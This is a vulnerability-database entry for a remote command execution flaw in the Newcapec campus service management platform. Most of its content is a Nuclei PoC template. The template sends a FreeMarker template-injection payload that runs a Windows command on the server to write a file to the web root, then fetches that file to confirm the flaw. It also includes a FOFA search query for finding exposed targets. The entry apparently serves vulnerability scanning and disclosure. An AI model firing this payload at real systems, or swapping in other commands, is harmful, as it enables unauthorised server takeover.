newcapec-rce: Newcapec - Remote Code Execution

日期: 2025-08-01 | 影响软件: Newcapec | POC: 已公开

漏洞描述

Newcapec front-end service management platform service.action interface has a remote command execution vulnerability, attackers can use the vulnerability to obtain server permissions.

PoC代码[已公开]

id: newcapec-rce

info:
  name: Newcapec - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Newcapec front-end service management platform service.action interface has a remote command execution vulnerability, attackers can use the vulnerability to obtain server permissions.
  reference:
    - https://forum.butian.net/article/242
  metadata:
    max-request: 2
    fofa-query: title="掌上校园服务管理平台"
  tags: newcapec,rce,intrusive,vuln

variables:
  file: "{{rand_base(5)}}"
  data: "{{randstr}}"

http:
  - raw:
      - |
        @timeout: 30s
        POST /service_transport/service.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"command":"GetFZinfo","UnitCode":"<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo {{data}} > ./webapps/ROOT/{{file}}.txt\")}"}

      - |
        GET /{{file}}.txt HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 == 200'
          - 'contains(header_1, "text/plain") && contains(header_2, "text/plain")'
          - 'contains(body_1, "{\"_result\":")'
          - 'contains(body_2, "{{data}}")'
        condition: and
# digest: 4b0a00483046022100ee87d2a68cd5a9a6b5fa0139e2a35606c7fcba93b8224745c4ad5f6fdcc8c0ff022100aba5ec819e86125b59b7399cf4dd55457046234a0cf5464b287bfaa617a04ab1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐